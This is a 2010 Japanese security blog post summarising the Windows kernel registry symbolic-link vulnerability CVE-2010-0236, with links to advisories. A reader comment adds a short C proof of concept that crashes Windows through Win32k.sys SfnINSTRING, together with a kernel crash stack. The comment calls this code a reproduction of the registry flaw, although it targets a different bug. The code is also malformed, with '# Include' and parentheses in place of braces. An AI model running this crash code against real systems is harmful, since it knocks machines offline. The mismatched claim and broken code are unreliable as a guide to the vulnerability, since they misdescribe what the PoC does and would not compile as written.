金曜日, 4月 23, 2010

Windows KernelレジストリSymbolicリンク問題(CVE-2010-0236)

本件問題発見日は2010年4月13日、その日から確認時間がかかりましたが正式なCVEアップデートは何回も出てファイナル情報を纏めてJST今朝になりました。

Windowsカーネルのレジストリのセキュリティ問題ですが、明確にはカーネルがsymbolicリンクの対応バグがあり システム権限を取られ色んなファイルを実行する事が出来ます。もしハッカーがこのバグを使いのエクスプロイトコードが分かったらリモートやローカルセキュリティ攻撃仕組みを作れます。ようはリモートからパソコンの権利が取られてしまう可能性が高いです。もし攻撃が失敗してしまうとパソコンはDoS状態になってしまう可能性が高いです。

全体WindowsOSに影響になります。詳細なOSバージョンはセキュリティフォカスサイトへご確認下さい↓
http://www.securityfocus.com/bid/39323


下記はその他リファレンスです↓

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0236

http://www.microsoft.com/technet/security/Bulletin/MS10-021.mspx

---
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

Posted by unixfreaxjp at 11:32 午前

1 件のコメント:

  1. unixfreaxjp2010年4月24日 10:22:00 JST

    本問題の再現仕方は下記Scriptとなります、貴方のシステムはこの問題に影響されたかど確認の為に再現方法をシェアします↓

    ーーーーここから
    # Include "stdafx.h"
    # Include "windows.h"
    int main (int argc, char * argv [])
    (
    printf("Microsoft Windows Win32k.sys SfnINSTRING Local D.O.S Vuln\nBy MJ0011\nth_decoder$126.com\nPressEnter");

    getchar();

    HWND hwnd = FindWindow ("DDEMLEvent", NULL);

    if (hwnd == 0)
    (
    printf ("cannot find DDEMLEvent Window! \ n");
    return 0;
    )

    PostMessage (hwnd, 0x18d, 0x0, 0x80000000);


    return 0;
    )

    ーーーーここまで

    上記のコードを実効するとこんな動きとなtります↓
    Common crash stack:

    kd> kc

    win32k! SfnINSTRING
    win32k! xxxDefWindowProc
    win32k! xxxEventWndProc
    win32k! xxxDispatchMessage
    win32k! NtUserDispatchMessage
    ....(など)

    ちなみにWinVistaやWin7が大丈夫です。影響無

    ----

    unixfreaxjp

    返信削除

登録: コメントの投稿 (Atom)